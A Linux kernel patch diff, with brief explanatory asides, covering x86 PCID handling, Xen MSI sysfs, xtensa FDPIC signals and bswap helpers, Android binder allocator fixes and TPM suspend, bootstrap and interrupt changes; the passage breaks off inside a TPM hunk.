+diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
+index 9121bc1b9453a..0d5ccea2538fc 100644
+--- a/arch/x86/mm/init.c
++++ b/arch/x86/mm/init.c
+@@ -9,6 +9,7 @@
+ #include <linux/sched/task.h>
+ 
+ #include <asm/set_memory.h>
++#include <asm/cpu_device_id.h>
+ #include <asm/e820/api.h>
+ #include <asm/init.h>
+ #include <asm/page.h>
+@@ -260,6 +261,24 @@ static void __init probe_page_size_mask(void)
+ 	}
+ }
+ 
++#define INTEL_MATCH(_model) { .vendor  = X86_VENDOR_INTEL,	\
++			      .family  = 6,			\
++			      .model = _model,			\
++			    }
++/*
++ * INVLPG may not properly flush Global entries
++ * on these CPUs when PCIDs are enabled.
++ */
++static const struct x86_cpu_id invlpg_miss_ids[] = {
++	INTEL_MATCH(INTEL_FAM6_ALDERLAKE   ),
++	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_L ),
++	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_N ),
++	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE  ),
++	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_P),
++	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_S),
++	{}
++};
++
+ static void setup_pcid(void)
+ {
+ 	if (!IS_ENABLED(CONFIG_X86_64))
+@@ -268,6 +287,12 @@ static void setup_pcid(void)
+ 	if (!boot_cpu_has(X86_FEATURE_PCID))
+ 		return;
+ 
++	if (x86_match_cpu(invlpg_miss_ids)) {
++		pr_info("Incomplete global flushes, disabling PCID");
++		setup_clear_cpu_cap(X86_FEATURE_PCID);
++		return;
++	}
++
+ 	if (boot_cpu_has(X86_FEATURE_PGE)) {
+ 		/*
+ 		 * This can't be cr4_set_bits_and_update_boot() -- the
+diff --git a/arch/x86/pci/xen.c b/arch/x86/pci/xen.c
+index b94f727251b64..5a4ecf0c2ac4d 100644
+--- a/arch/x86/pci/xen.c
++++ b/arch/x86/pci/xen.c
+@@ -198,7 +198,7 @@ static int xen_setup_msi_irqs(struct pci_dev *dev, int nvec, int type)
+ 		i++;
+ 	}
+ 	kfree(v);
+-	return 0;
++	return msi_device_populate_sysfs(&dev->dev);
+ 
+ error:
+ 	if (ret == -ENOSYS)
+@@ -254,7 +254,7 @@ static int xen_hvm_setup_msi_irqs(struct pci_dev *dev, int nvec, int type)
+ 		dev_dbg(&dev->dev,
+ 			"xen: msi --> pirq=%d --> irq=%d\n", pirq, irq);
+ 	}
+-	return 0;
++	return msi_device_populate_sysfs(&dev->dev);
+ 
+ error:
+ 	dev_err(&dev->dev, "Failed to create MSI%s! ret=%d!\n",
+@@ -346,7 +346,7 @@ static int xen_initdom_setup_msi_irqs(struct pci_dev *dev, int nvec, int type)
+ 		if (ret < 0)
+ 			goto out;
+ 	}
+-	ret = 0;
++	ret = msi_device_populate_sysfs(&dev->dev);
+ out:
+ 	return ret;
+ }
+@@ -393,6 +393,8 @@ static void xen_teardown_msi_irqs(struct pci_dev *dev)
+ 		for (i = 0; i < msidesc->nvec_used; i++)
+ 			xen_destroy_irq(msidesc->irq + i);
+ 	}
++
++	msi_device_destroy_sysfs(&dev->dev);
+ }
+ 
+ static void xen_pv_teardown_msi_irqs(struct pci_dev *dev)
+diff --git a/arch/xtensa/kernel/signal.c b/arch/xtensa/kernel/signal.c
+index 876d5df157ed9..5c01d7e70d90d 100644
+--- a/arch/xtensa/kernel/signal.c
++++ b/arch/xtensa/kernel/signal.c
+@@ -343,7 +343,19 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	struct rt_sigframe *frame;
+ 	int err = 0, sig = ksig->sig;
+ 	unsigned long sp, ra, tp, ps;
++	unsigned long handler = (unsigned long)ksig->ka.sa.sa_handler;
++	unsigned long handler_fdpic_GOT = 0;
+ 	unsigned int base;
++	bool fdpic = IS_ENABLED(CONFIG_BINFMT_ELF_FDPIC) &&
++		(current->personality & FDPIC_FUNCPTRS);
++
++	if (fdpic) {
++		unsigned long __user *fdpic_func_desc =
++			(unsigned long __user *)handler;
++		if (__get_user(handler, &fdpic_func_desc[0]) ||
++		    __get_user(handler_fdpic_GOT, &fdpic_func_desc[1]))
++			return -EFAULT;
++	}
+ 
+ 	sp = regs->areg[1];
+ 
+@@ -373,20 +385,26 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	err |= __copy_to_user(&frame->uc.uc_sigmask, set, sizeof(*set));
+ 
+ 	if (ksig->ka.sa.sa_flags & SA_RESTORER) {
+-		ra = (unsigned long)ksig->ka.sa.sa_restorer;
++		if (fdpic) {
++			unsigned long __user *fdpic_func_desc =
++				(unsigned long __user *)ksig->ka.sa.sa_restorer;
++
++			err |= __get_user(ra, fdpic_func_desc);
++		} else {
++			ra = (unsigned long)ksig->ka.sa.sa_restorer;
++		}
+ 	} else {
+ 
+ 		/* Create sys_rt_sigreturn syscall in stack frame */
+ 
+ 		err |= gen_return_code(frame->retcode);
+-
+-		if (err) {
+-			return -EFAULT;
+-		}
+ 		ra = (unsigned long) frame->retcode;
+ 	}
+ 
+-	/* 
++	if (err)
++		return -EFAULT;
++
++	/*
+ 	 * Create signal handler execution context.
+ 	 * Return context not modified until this point.
+ 	 */
+@@ -394,8 +412,7 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	/* Set up registers for signal handler; preserve the threadptr */
+ 	tp = regs->threadptr;
+ 	ps = regs->ps;
+-	start_thread(regs, (unsigned long) ksig->ka.sa.sa_handler,
+-		     (unsigned long) frame);
++	start_thread(regs, handler, (unsigned long)frame);
+ 
+ 	/* Set up a stack frame for a call4 if userspace uses windowed ABI */
+ 	if (ps & PS_WOE_MASK) {
+@@ -413,6 +430,8 @@ static int setup_frame(struct ksignal *ksig, sigset_t *set,
+ 	regs->areg[base + 4] = (unsigned long) &frame->uc;
+ 	regs->threadptr = tp;
+ 	regs->ps = ps;
++	if (fdpic)
++		regs->areg[base + 11] = handler_fdpic_GOT;
+ 
+ 	pr_debug("SIG rt deliver (%s:%d): signal=%d sp=%p pc=%08lx\n",
+ 		 current->comm, current->pid, sig, frame, regs->pc);
+diff --git a/arch/xtensa/kernel/xtensa_ksyms.c b/arch/xtensa/kernel/xtensa_ksyms.c
+index 2a31b1ab0c9f2..17a7ef86fd0dd 100644
+--- a/arch/xtensa/kernel/xtensa_ksyms.c
++++ b/arch/xtensa/kernel/xtensa_ksyms.c
+@@ -56,6 +56,8 @@ EXPORT_SYMBOL(empty_zero_page);
+  */
+ extern long long __ashrdi3(long long, int);
+ extern long long __ashldi3(long long, int);
++extern long long __bswapdi2(long long);
++extern int __bswapsi2(int);
+ extern long long __lshrdi3(long long, int);
+ extern int __divsi3(int, int);
+ extern int __modsi3(int, int);
+@@ -66,6 +68,8 @@ extern unsigned long long __umulsidi3(unsigned int, unsigned int);
+ 
+ EXPORT_SYMBOL(__ashldi3);
+ EXPORT_SYMBOL(__ashrdi3);
++EXPORT_SYMBOL(__bswapdi2);
++EXPORT_SYMBOL(__bswapsi2);
+ EXPORT_SYMBOL(__lshrdi3);
+ EXPORT_SYMBOL(__divsi3);
+ EXPORT_SYMBOL(__modsi3);
+diff --git a/arch/xtensa/lib/Makefile b/arch/xtensa/lib/Makefile
+index 7ecef0519a27c..c9c2614188f74 100644
+--- a/arch/xtensa/lib/Makefile
++++ b/arch/xtensa/lib/Makefile
+@@ -4,7 +4,7 @@
+ #
+ 
+ lib-y	+= memcopy.o memset.o checksum.o \
+-	   ashldi3.o ashrdi3.o lshrdi3.o \
++	   ashldi3.o ashrdi3.o bswapdi2.o bswapsi2.o lshrdi3.o \
+ 	   divsi3.o udivsi3.o modsi3.o umodsi3.o mulsi3.o umulsidi3.o \
+ 	   usercopy.o strncpy_user.o strnlen_user.o
+ lib-$(CONFIG_PCI) += pci-auto.o
+diff --git a/arch/xtensa/lib/bswapdi2.S b/arch/xtensa/lib/bswapdi2.S
+new file mode 100644
+index 0000000000000..d8e52e05eba66
+--- /dev/null
++++ b/arch/xtensa/lib/bswapdi2.S
+@@ -0,0 +1,21 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later WITH GCC-exception-2.0 */
++#include <linux/linkage.h>
++#include <asm/asmmacro.h>
++#include <asm/core.h>
++
++ENTRY(__bswapdi2)
++
++	abi_entry_default
++	ssai	8
++	srli	a4, a2, 16
++	src	a4, a4, a2
++	src	a4, a4, a4
++	src	a4, a2, a4
++	srli	a2, a3, 16
++	src	a2, a2, a3
++	src	a2, a2, a2
++	src	a2, a3, a2
++	mov	a3, a4
++	abi_ret_default
++
++ENDPROC(__bswapdi2)
+diff --git a/arch/xtensa/lib/bswapsi2.S b/arch/xtensa/lib/bswapsi2.S
+new file mode 100644
+index 0000000000000..9c1de1344f79a
+--- /dev/null
++++ b/arch/xtensa/lib/bswapsi2.S
+@@ -0,0 +1,16 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later WITH GCC-exception-2.0 */
++#include <linux/linkage.h>
++#include <asm/asmmacro.h>
++#include <asm/core.h>
++
++ENTRY(__bswapsi2)
++
++	abi_entry_default
++	ssai	8
++	srli	a3, a2, 16
++	src	a3, a3, a2
++	src	a3, a3, a3
++	src	a2, a2, a3
++	abi_ret_default
++
++ENDPROC(__bswapsi2)
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 880224ec6abb8..e374a8a2da46e 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -1934,24 +1934,23 @@ static void binder_deferred_fd_close(int fd)
+ static void binder_transaction_buffer_release(struct binder_proc *proc,
+ 					      struct binder_thread *thread,
+ 					      struct binder_buffer *buffer,
+-					      binder_size_t failed_at,
++					      binder_size_t off_end_offset,
+ 					      bool is_failure)
+ {
+ 	int debug_id = buffer->debug_id;
+-	binder_size_t off_start_offset, buffer_offset, off_end_offset;
++	binder_size_t off_start_offset, buffer_offset;
+ 
+ 	binder_debug(BINDER_DEBUG_TRANSACTION,
+ 		     "%d buffer release %d, size %zd-%zd, failed at %llx\n",
+ 		     proc->pid, buffer->debug_id,
+ 		     buffer->data_size, buffer->offsets_size,
+-		     (unsigned long long)failed_at);
++		     (unsigned long long)off_end_offset);
+ 
+ 	if (buffer->target_node)
+ 		binder_dec_node(buffer->target_node, 1, 0);
+ 
+ 	off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
+-	off_end_offset = is_failure && failed_at ? failed_at :
+-				off_start_offset + buffer->offsets_size;
++
+ 	for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
+ 	     buffer_offset += sizeof(binder_size_t)) {
+ 		struct binder_object_header *hdr;
+@@ -2111,6 +2110,21 @@ static void binder_transaction_buffer_release(struct binder_proc *proc,
+ 	}
+ }
+ 
++/* Clean up all the objects in the buffer */
++static inline void binder_release_entire_buffer(struct binder_proc *proc,
++						struct binder_thread *thread,
++						struct binder_buffer *buffer,
++						bool is_failure)
++{
++	binder_size_t off_end_offset;
++
++	off_end_offset = ALIGN(buffer->data_size, sizeof(void *));
++	off_end_offset += buffer->offsets_size;
++
++	binder_transaction_buffer_release(proc, thread, buffer,
++					  off_end_offset, is_failure);
++}
++
+ static int binder_translate_binder(struct flat_binder_object *fp,
+ 				   struct binder_transaction *t,
+ 				   struct binder_thread *thread)
+@@ -2801,7 +2815,7 @@ static int binder_proc_transaction(struct binder_transaction *t,
+ 		t_outdated->buffer = NULL;
+ 		buffer->transaction = NULL;
+ 		trace_binder_transaction_update_buffer_release(buffer);
+-		binder_transaction_buffer_release(proc, NULL, buffer, 0, 0);
++		binder_release_entire_buffer(proc, NULL, buffer, false);
+ 		binder_alloc_free_buf(&proc->alloc, buffer);
+ 		kfree(t_outdated);
+ 		binder_stats_deleted(BINDER_STAT_TRANSACTION);
+@@ -3759,7 +3773,7 @@ binder_free_buf(struct binder_proc *proc,
+ 		binder_node_inner_unlock(buf_node);
+ 	}
+ 	trace_binder_transaction_buffer_release(buffer);
+-	binder_transaction_buffer_release(proc, thread, buffer, 0, is_failure);
++	binder_release_entire_buffer(proc, thread, buffer, is_failure);
+ 	binder_alloc_free_buf(&proc->alloc, buffer);
+ }
+ 
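
The new helper derives the true end of the offsets section instead of relying on the old sentinel value 0: flattened object data occupies the first data_size bytes, and the offsets array begins at the next pointer-aligned boundary. A worked example of that arithmetic, assuming 8-byte pointers (EX_ALIGN is a stand-in for the kernel's ALIGN macro):

#define EX_ALIGN(x, a)	(((x) + (a) - 1) & ~((a) - 1))	/* round x up to a multiple of a */

/* With data_size = 29 and offsets_size = 16:
 *   off_start_offset = EX_ALIGN(29, 8) = 32
 *   off_end_offset   = 32 + 16        = 48
 * so flattened objects live in buffer bytes [0, 29) and their
 * offsets array occupies bytes [32, 48).
 */
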
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index 4ad42b0f75cd9..4fb89ef067d57 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -212,8 +212,8 @@ static int binder_update_page_range(struct binder_alloc *alloc, int allocate,
+ 		mm = alloc->mm;
+ 
+ 	if (mm) {
+-		mmap_read_lock(mm);
+-		vma = vma_lookup(mm, alloc->vma_addr);
++		mmap_write_lock(mm);
++		vma = alloc->vma;
+ 	}
+ 
+ 	if (!vma && need_mm) {
+@@ -270,7 +270,7 @@ static int binder_update_page_range(struct binder_alloc *alloc, int allocate,
+ 		trace_binder_alloc_page_end(alloc, index);
+ 	}
+ 	if (mm) {
+-		mmap_read_unlock(mm);
++		mmap_write_unlock(mm);
+ 		mmput(mm);
+ 	}
+ 	return 0;
+@@ -303,21 +303,24 @@ err_page_ptr_cleared:
+ 	}
+ err_no_vma:
+ 	if (mm) {
+-		mmap_read_unlock(mm);
++		mmap_write_unlock(mm);
+ 		mmput(mm);
+ 	}
+ 	return vma ? -ENOMEM : -ESRCH;
+ }
+ 
++static inline void binder_alloc_set_vma(struct binder_alloc *alloc,
++		struct vm_area_struct *vma)
++{
++	/* pairs with smp_load_acquire in binder_alloc_get_vma() */
++	smp_store_release(&alloc->vma, vma);
++}
++
+ static inline struct vm_area_struct *binder_alloc_get_vma(
+ 		struct binder_alloc *alloc)
+ {
+-	struct vm_area_struct *vma = NULL;
+-
+-	if (alloc->vma_addr)
+-		vma = vma_lookup(alloc->mm, alloc->vma_addr);
+-
+-	return vma;
++	/* pairs with smp_store_release in binder_alloc_set_vma() */
++	return smp_load_acquire(&alloc->vma);
+ }
+ 
+ static bool debug_low_async_space_locked(struct binder_alloc *alloc, int pid)
+@@ -380,15 +383,13 @@ static struct binder_buffer *binder_alloc_new_buf_locked(
+ 	size_t size, data_offsets_size;
+ 	int ret;
+ 
+-	mmap_read_lock(alloc->mm);
++	/* Check binder_alloc is fully initialized */
+ 	if (!binder_alloc_get_vma(alloc)) {
+-		mmap_read_unlock(alloc->mm);
+ 		binder_alloc_debug(BINDER_DEBUG_USER_ERROR,
+ 				   "%d: binder_alloc_buf, no vma\n",
+ 				   alloc->pid);
+ 		return ERR_PTR(-ESRCH);
+ 	}
+-	mmap_read_unlock(alloc->mm);
+ 
+ 	data_offsets_size = ALIGN(data_size, sizeof(void *)) +
+ 		ALIGN(offsets_size, sizeof(void *));
+@@ -778,7 +779,9 @@ int binder_alloc_mmap_handler(struct binder_alloc *alloc,
+ 	buffer->free = 1;
+ 	binder_insert_free_buffer(alloc, buffer);
+ 	alloc->free_async_space = alloc->buffer_size / 2;
+-	alloc->vma_addr = vma->vm_start;
++
++	/* Signal binder_alloc is fully initialized */
++	binder_alloc_set_vma(alloc, vma);
+ 
+ 	return 0;
+ 
+@@ -808,8 +811,7 @@ void binder_alloc_deferred_release(struct binder_alloc *alloc)
+ 
+ 	buffers = 0;
+ 	mutex_lock(&alloc->mutex);
+-	BUG_ON(alloc->vma_addr &&
+-	       vma_lookup(alloc->mm, alloc->vma_addr));
++	BUG_ON(alloc->vma);
+ 
+ 	while ((n = rb_first(&alloc->allocated_buffers))) {
+ 		buffer = rb_entry(n, struct binder_buffer, rb_node);
+@@ -916,25 +918,17 @@ void binder_alloc_print_pages(struct seq_file *m,
+ 	 * Make sure the binder_alloc is fully initialized, otherwise we might
+ 	 * read inconsistent state.
+ 	 */
+-
+-	mmap_read_lock(alloc->mm);
+-	if (binder_alloc_get_vma(alloc) == NULL) {
+-		mmap_read_unlock(alloc->mm);
+-		goto uninitialized;
+-	}
+-
+-	mmap_read_unlock(alloc->mm);
+-	for (i = 0; i < alloc->buffer_size / PAGE_SIZE; i++) {
+-		page = &alloc->pages[i];
+-		if (!page->page_ptr)
+-			free++;
+-		else if (list_empty(&page->lru))
+-			active++;
+-		else
+-			lru++;
++	if (binder_alloc_get_vma(alloc) != NULL) {
++		for (i = 0; i < alloc->buffer_size / PAGE_SIZE; i++) {
++			page = &alloc->pages[i];
++			if (!page->page_ptr)
++				free++;
++			else if (list_empty(&page->lru))
++				active++;
++			else
++				lru++;
++		}
+ 	}
+-
+-uninitialized:
+ 	mutex_unlock(&alloc->mutex);
+ 	seq_printf(m, "  pages: %d:%d:%d\n", active, lru, free);
+ 	seq_printf(m, "  pages high watermark: %zu\n", alloc->pages_high);
+@@ -969,7 +963,7 @@ int binder_alloc_get_allocated_count(struct binder_alloc *alloc)
+  */
+ void binder_alloc_vma_close(struct binder_alloc *alloc)
+ {
+-	alloc->vma_addr = 0;
++	binder_alloc_set_vma(alloc, NULL);
+ }
+ 
+ /**
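
The vma pointer now doubles as the "fully initialized" signal: binder_alloc_set_vma() publishes it with smp_store_release() only after every other binder_alloc field has been set up, and any reader that observes a non-NULL pointer via smp_load_acquire() is guaranteed to also see those earlier writes. A generic sketch of this publish/consume pattern (struct and helper names are hypothetical):

struct pub_ctx {
	int cfg;			/* plain field, written before publish */
	struct resource *res;		/* NULL until initialization completes */
};

static void publish(struct pub_ctx *c, struct resource *r, int cfg)
{
	c->cfg = cfg;			/* ordinary writes first ... */
	smp_store_release(&c->res, r);	/* ... then publish the pointer */
}

static bool consume(struct pub_ctx *c)
{
	struct resource *r = smp_load_acquire(&c->res);

	if (!r)
		return false;		/* not initialized yet */
	use(c->cfg, r);			/* hypothetical; sees cfg written above */
	return true;
}
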
+diff --git a/drivers/android/binder_alloc.h b/drivers/android/binder_alloc.h
+index 0f811ac4bcffd..138d1d5af9ce3 100644
+--- a/drivers/android/binder_alloc.h
++++ b/drivers/android/binder_alloc.h
+@@ -75,7 +75,7 @@ struct binder_lru_page {
+ /**
+  * struct binder_alloc - per-binder proc state for binder allocator
+  * @mutex:              protects binder_alloc fields
+- * @vma_addr:           vm_area_struct->vm_start passed to mmap_handler
++ * @vma:                vm_area_struct passed to mmap_handler
+  *                      (invariant after mmap)
+  * @mm:                 copy of task->mm (invariant after open)
+  * @buffer:             base of per-proc address space mapped via mmap
+@@ -99,7 +99,7 @@ struct binder_lru_page {
+  */
+ struct binder_alloc {
+ 	struct mutex mutex;
+-	unsigned long vma_addr;
++	struct vm_area_struct *vma;
+ 	struct mm_struct *mm;
+ 	void __user *buffer;
+ 	struct list_head buffers;
+diff --git a/drivers/android/binder_alloc_selftest.c b/drivers/android/binder_alloc_selftest.c
+index 43a881073a428..c2b323bc3b3a5 100644
+--- a/drivers/android/binder_alloc_selftest.c
++++ b/drivers/android/binder_alloc_selftest.c
+@@ -287,7 +287,7 @@ void binder_selftest_alloc(struct binder_alloc *alloc)
+ 	if (!binder_selftest_run)
+ 		return;
+ 	mutex_lock(&binder_selftest_lock);
+-	if (!binder_selftest_run || !alloc->vma_addr)
++	if (!binder_selftest_run || !alloc->vma)
+ 		goto done;
+ 	pr_info("STARTED\n");
+ 	binder_selftest_alloc_offset(alloc, end_offset, 0);
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 5165f6d3da228..95d847c9de79a 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -568,6 +568,10 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+ 
++	/* Give back zero bytes, as the TPM chip has not yet fully resumed: */
++	if (chip->flags & TPM_CHIP_FLAG_SUSPENDED)
++		return 0;
++
+ 	return tpm_get_random(chip, data, max);
+ }
+ 
+@@ -601,6 +605,42 @@ static int tpm_get_pcr_allocation(struct tpm_chip *chip)
+ 	return rc;
+ }
+ 
++/*
++ * tpm_chip_bootstrap() - Bootstrap TPM chip after power on
++ * @chip: TPM chip to use.
++ *
++ * Initialize TPM chip after power on. This is a one-shot function: subsequent
++ * calls will have no effect.
++ */
++int tpm_chip_bootstrap(struct tpm_chip *chip)
++{
++	int rc;
++
++	if (chip->flags & TPM_CHIP_FLAG_BOOTSTRAPPED)
++		return 0;
++
++	rc = tpm_chip_start(chip);
++	if (rc)
++		return rc;
++
++	rc = tpm_auto_startup(chip);
++	if (rc)
++		goto stop;
++
++	rc = tpm_get_pcr_allocation(chip);
++stop:
++	tpm_chip_stop(chip);
++
++	/*
++	 * Unconditionally set, as driver initialization should cease when the
++	 * bootstrapping process fails.
++	 */
++	chip->flags |= TPM_CHIP_FLAG_BOOTSTRAPPED;
++
++	return rc;
++}
++EXPORT_SYMBOL_GPL(tpm_chip_bootstrap);
++
+ /*
+  * tpm_chip_register() - create a character device for the TPM chip
+  * @chip: TPM chip to use.
+@@ -616,17 +656,7 @@ int tpm_chip_register(struct tpm_chip *chip)
+ {
+ 	int rc;
+ 
+-	rc = tpm_chip_start(chip);
+-	if (rc)
+-		return rc;
+-	rc = tpm_auto_startup(chip);
+-	if (rc) {
+-		tpm_chip_stop(chip);
+-		return rc;
+-	}
+-
+-	rc = tpm_get_pcr_allocation(chip);
+-	tpm_chip_stop(chip);
++	rc = tpm_chip_bootstrap(chip);
+ 	if (rc)
+ 		return rc;
+ 
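
With the bootstrap sequence factored out, a bus driver can run the power-on setup itself before touching interrupt configuration, and the later call inside tpm_chip_register() degenerates into a flag check (the tpm_tis_core hunk further down does exactly this). A sketch of the intended call order, where example_driver_init() is a hypothetical caller:

static int example_driver_init(struct tpm_chip *chip)
{
	int rc;

	rc = tpm_chip_bootstrap(chip);	/* first caller does the real work */
	if (rc)
		return rc;

	/* ... driver setup that needs a started chip, e.g. IRQ probing ... */

	return tpm_chip_register(chip);	/* bootstrap inside is now a no-op */
}
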
+diff --git a/drivers/char/tpm/tpm-interface.c b/drivers/char/tpm/tpm-interface.c
+index 7e513b7718320..0f941cb32eb17 100644
+--- a/drivers/char/tpm/tpm-interface.c
++++ b/drivers/char/tpm/tpm-interface.c
+@@ -412,6 +412,8 @@ int tpm_pm_suspend(struct device *dev)
+ 	}
+ 
+ suspended:
++	chip->flags |= TPM_CHIP_FLAG_SUSPENDED;
++
+ 	if (rc)
+ 		dev_err(dev, "Ignoring error %d while suspending\n", rc);
+ 	return 0;
+@@ -429,6 +431,14 @@ int tpm_pm_resume(struct device *dev)
+ 	if (chip == NULL)
+ 		return -ENODEV;
+ 
++	chip->flags &= ~TPM_CHIP_FLAG_SUSPENDED;
++
++	/*
++	 * Guarantee that SUSPENDED is written last, so that hwrng does not
++	 * activate before the chip has been fully resumed.
++	 */
++	wmb();
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(tpm_pm_resume);
+diff --git a/drivers/char/tpm/tpm.h b/drivers/char/tpm/tpm.h
+index 830014a266090..f6c99b3f00458 100644
+--- a/drivers/char/tpm/tpm.h
++++ b/drivers/char/tpm/tpm.h
+@@ -263,6 +263,7 @@ static inline void tpm_msleep(unsigned int delay_msec)
+ 		     delay_msec * 1000);
+ };
+ 
++int tpm_chip_bootstrap(struct tpm_chip *chip);
+ int tpm_chip_start(struct tpm_chip *chip);
+ void tpm_chip_stop(struct tpm_chip *chip);
+ struct tpm_chip *tpm_find_get_ops(struct tpm_chip *chip);
+diff --git a/drivers/char/tpm/tpm_tis.c b/drivers/char/tpm/tpm_tis.c
+index 4be19d8f3ca95..0d084d6652c41 100644
+--- a/drivers/char/tpm/tpm_tis.c
++++ b/drivers/char/tpm/tpm_tis.c
+@@ -243,7 +243,7 @@ static int tpm_tis_init(struct device *dev, struct tpm_info *tpm_info)
+ 		irq = tpm_info->irq;
+ 
+ 	if (itpm || is_itpm(ACPI_COMPANION(dev)))
+-		phy->priv.flags |= TPM_TIS_ITPM_WORKAROUND;
++		set_bit(TPM_TIS_ITPM_WORKAROUND, &phy->priv.flags);
+ 
+ 	return tpm_tis_core_init(dev, &phy->priv, irq, &tpm_tcg,
+ 				 ACPI_HANDLE(dev));
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index eecfbd7e97867..f02b583005a53 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -53,41 +53,63 @@ static int wait_for_tpm_stat(struct tpm_chip *chip, u8 mask,
+ 	long rc;
+ 	u8 status;
+ 	bool canceled = false;
++	u8 sts_mask = 0;
++	int ret = 0;
+ 
+ 	/* check current status */
+ 	status = chip->ops->status(chip);
+ 	if ((status & mask) == mask)
+ 		return 0;
+ 
+-	stop = jiffies + timeout;
++	/* check what status changes can be handled by irqs */
++	if (priv->int_mask & TPM_INTF_STS_VALID_INT)
++		sts_mask |= TPM_STS_VALID;
+ 
+-	if (chip->flags & TPM_CHIP_FLAG_IRQ) {
++	if (priv->int_mask & TPM_INTF_DATA_AVAIL_INT)
++		sts_mask |= TPM_STS_DATA_AVAIL;
++
++	if (priv->int_mask & TPM_INTF_CMD_READY_INT)
++		sts_mask |= TPM_STS_COMMAND_READY;
++
++	sts_mask &= mask;
++
++	stop = jiffies + timeout;
++	/* process status changes with irq support */
++	if (sts_mask) {
++		ret = -ETIME;
+ again:
+ 		timeout = stop - jiffies;
+ 		if ((long)timeout <= 0)
+ 			return -ETIME;
+ 		rc = wait_event_interruptible_timeout(*queue,
+-			wait_for_tpm_stat_cond(chip, mask, check_cancel,
++			wait_for_tpm_stat_cond(chip, sts_mask, check_cancel,
+ 					       &canceled),
+ 			timeout);
+ 		if (rc > 0) {
+ 			if (canceled)
+ 				return -ECANCELED;
+-			return 0;
++			ret = 0;
+ 		}
+ 		if (rc == -ERESTARTSYS && freezing(current)) {
+ 			clear_thread_flag(TIF_SIGPENDING);
+ 			goto again;
+ 		}
+-	} else {
+-		do {
+-			usleep_range(priv->timeout_min,
+-				     priv->timeout_max);
+-			status = chip->ops->status(chip);
+-			if ((status & mask) == mask)
+-				return 0;
+-		} while (time_before(jiffies, stop));
+ 	}
++
++	if (ret)
++		return ret;
++
++	mask &= ~sts_mask;
++	if (!mask) /* all done */
++		return 0;
++	/* process status changes without irq support */
++	do {
++		status = chip->ops->status(chip);
++		if ((status & mask) == mask)
++			return 0;
++		usleep_range(priv->timeout_min,
++			     priv->timeout_max);
++	} while (time_before(jiffies, stop));
+ 	return -ETIME;
+ }
+ 
+@@ -376,7 +398,7 @@ static int tpm_tis_send_data(struct tpm_chip *chip, const u8 *buf, size_t len)
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 	int rc, status, burstcnt;
+ 	size_t count = 0;
+-	bool itpm = priv->flags & TPM_TIS_ITPM_WORKAROUND;
++	bool itpm = test_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags);
+ 
+ 	status = tpm_tis_status(chip);
+ 	if ((status & TPM_STS_COMMAND_READY) == 0) {
+@@ -509,7 +531,8 @@ static int tpm_tis_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 	int rc, irq;
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	if (!(chip->flags & TPM_CHIP_FLAG_IRQ) || priv->irq_tested)
++	if (!(chip->flags & TPM_CHIP_FLAG_IRQ) ||
++	     test_bit(TPM_TIS_IRQ_TESTED, &priv->flags))
+ 		return tpm_tis_send_main(chip, buf, len);
+ 
+ 	/* Verify receipt of the expected IRQ */
+@@ -519,11 +542,11 @@ static int tpm_tis_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 	rc = tpm_tis_send_main(chip, buf, len);
+ 	priv->irq = irq;
+ 	chip->flags |= TPM_CHIP_FLAG_IRQ;
+-	if (!priv->irq_tested)
++	if (!test_bit(TPM_TIS_IRQ_TESTED, &priv->flags))
+ 		tpm_msleep(1);
+-	if (!priv->irq_tested)
++	if (!test_bit(TPM_TIS_IRQ_TESTED, &priv->flags))
+ 		disable_interrupts(chip);
+-	priv->irq_tested = true;
++	set_bit(TPM_TIS_IRQ_TESTED, &priv->flags);
+ 	return rc;
+ }
+ 
+@@ -666,7 +689,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 	size_t len = sizeof(cmd_getticks);
+ 	u16 vendor;
+ 
+-	if (priv->flags & TPM_TIS_ITPM_WORKAROUND)
++	if (test_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags))
+ 		return 0;
+ 
+ 	rc = tpm_tis_read16(priv, TPM_DID_VID(0), &vendor);
+@@ -686,13 +709,13 @@ static int probe_itpm(struct tpm_chip *chip)
+ 
+ 	tpm_tis_ready(chip);
+ 
+-	priv->flags |= TPM_TIS_ITPM_WORKAROUND;
++	set_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags);
+ 
+ 	rc = tpm_tis_send_data(chip, cmd_getticks, len);
+ 	if (rc == 0)
+ 		dev_info(&chip->dev, "Detected an iTPM.\n");
+ 	else {
+-		priv->flags &= ~TPM_TIS_ITPM_WORKAROUND;
++		clear_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags);
+ 		rc = -EFAULT;
+ 	}
+ 
+@@ -736,7 +759,7 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 	if (interrupt == 0)
